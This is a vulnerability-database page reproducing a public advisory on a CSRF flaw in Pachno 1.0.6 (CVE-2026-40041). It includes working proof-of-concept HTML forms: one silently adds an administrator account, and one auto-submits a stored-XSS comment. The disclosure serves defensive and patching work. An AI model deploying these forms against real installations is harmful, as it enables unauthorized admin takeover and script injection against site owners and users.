Vulners
Lucene search
Pachno 1.0.6 Cross-Site Request Forgery
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2026-40041 | 13 Apr 202618:10 | – | attackerkb |
 | CVE-2026-40041 | 13 Apr 202620:38 | – | circl |
 | Pachno 跨站请求伪造漏洞 | 13 Apr 202600:00 | – | cnnvd |
 | CVE-2026-40041 | 13 Apr 202618:10 | – | cve |
 | CVE-2026-40041 Pachno 1.0.6 Cross-Site Request Forgery via State-Changing Endpoints | 13 Apr 202618:10 | – | cvelist |
 | EUVD-2026-22047 | 13 Apr 202621:30 | – | euvd |
 | CVE-2026-40041 | 13 Apr 202619:16 | – | nvd |
 | PT-2026-32495 | 13 Apr 202600:00 | – | ptsecurity |
 | CVE-2026-40041 | 12 May 202602:27 | – | redhatcve |
 | CVE-2026-40041 Pachno 1.0.6 Cross-Site Request Forgery via State-Changing Endpoints | 13 Apr 202618:10 | – | vulnrichment |
10
<html><body><p>Pachno 1.0.6 Cross-Site Request Forgery
Vendor: Daniel André Eikeland
Product web page: https://github.com/pachno/pachno
Affected version: 1.0.6
Summary: Pachno is an open-source collaboration platform (formerly known as The Bug Genie)
designed for team project management, issue tracking, and documentation. It offers a module-based,
customizable environment for software development and team workflows, distributed under the
Mozilla Public License.
Desc: CSRF protection in the application is opt-in via the @CsrfProtected annotation and the
csrf_enabled route flag, both of which are absent from a large set of state-changing endpoints
including login, registration, logout, file upload, milestone editing, group/role/team/client/user
administration, and Livelink commit posting. No same-origin enforcement, anti-CSRF token, or
SameSite=Strict cookie attribute is in place to compensate. This can be exploited to perform
arbitrary actions in context of an authenticated user, including forced logout, account creation
by an admin, role modification, comment injection, and file upload. This can be exploited to
perform certain actions with administrative privileges if a logged-in user visits a malicious
web site.
Tested on: GNU/Linux
Apache2
PHP/7.4
MySQL/5.7 (MariaDB)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2026-5983
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5983
06.04.2026
--
CSRF Add Admin:
---------------
</p>
<form action="http://127.0.0.1/configure/users" method="POST">
<input name="username" type="hidden" value="testingus"/>
<input name="password" type="hidden" value="pwd123"/>
<input name="password_repeat" type="hidden" value="pwd123"/>
<input name="email" type="hidden" value="[email protected]"/>
<input name="realname" type="hidden" value="ZSL"/>
<input name="group_id" type="hidden" value="1"/>
</form>
CSRF Script Injection (Stored XSS):
-----------------------------------
<form action="http://127.0.0.1/project/issues/17/comment" id="csrf" method="POST">
<input name="comment_body" value="IMPORTANTE: XSS Payload Here!"/>
<input name="comment_applies_type" value="1"/>
<input name="comment_applies_id" value="17"/>
<input name="comment_module" value="core"/>
<input name="comment_visibility" value="1"/>
<input name="comment_body_syntax" value="0"/>
</form>
<script>document.getElementById('csrf').submit();</script>
</body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Apr 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.14.3
CVSS 45.3
EPSS0.00018
SSVC